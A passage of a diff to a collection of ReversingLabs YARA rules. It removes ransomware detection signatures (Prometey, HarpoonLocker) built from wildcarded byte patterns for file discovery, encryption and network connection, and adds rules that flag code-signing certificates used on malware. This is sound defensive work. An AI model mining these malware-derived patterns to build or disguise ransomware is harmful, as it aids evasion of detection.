83 F8 ?? 77 ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? - ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 - 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 - ?? ?? ?? ?? E8 - } - $crypt_files = { - 8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89 - 4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20 - ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6 - 8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A - ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 - ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A - ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ?? - 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45 - ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53 - 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10 - ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ?? - 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB - ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33 - C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? - ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ?? - 8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74 - ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20 - ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($skip_hk_china_taiwan_p*)) and ( all of ($find_files_*)) and ($crypt_files) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV Virikton" and (pe.signatures[i].serial=="00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures[i].serial=="82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67") and 1463616000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE { meta: - description = "Yara rule that detects Prometey ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a5902fc6-2752-520f-be84-df9ea7b1e27d" - date = "2021-06-07" - modified = "2021-06-07" + id = "72745795-0261-5b7b-b25e-8220bced90ec" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12724-L12742" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Prometey" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3 - ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? - ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ?? - ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 - C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 - ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D - } - $remote_connection_p2 = { - FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? - 33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? - 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 - E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D - ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8 - } - $find_files_p1 = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? - ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? - 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? - ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? - ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A - ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B - 12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D - ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D - ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ?? - ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03 - } - $find_files_p2 = { - C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - 8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ?? - 83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75 - ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ?? - ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 - 7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC - 8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D - } - $find_files_p3 = { - 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ?? - 76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D - ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45 - ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 - } - $find_files_p4 = { - 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 - ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 - ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? - ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75 - ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ?? - 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files = { - 8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75 - ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9 - ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? - ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61 - ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 - ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60 - ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59 - 3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? ?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75 - ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75 - ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CREA&COM d.o.o." and (pe.signatures[i].serial=="00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures[i].serial=="dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0") and 1575849600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE { meta: - description = "Yara rule that detects HarpoonLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3605d354-5a33-54b1-83ad-ad514c78357b" - date = "2022-01-27" - modified = "2022-01-27" + id = "7180b20d-f367-5260-88cd-dd2a1269f89b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12744-L12760" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HarpoonLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F - ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D - ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E - 69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D - 09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? - ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ?? - 12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11 - ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 2B ?? 2A - } - $encrypt_files_p2 = { - 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28 - ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ?? - ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? - 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03 - 6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A - 13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30 - ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ?? - ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? - 06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? - DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F - ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ?? - D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11 - ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11 - ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13 - ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? 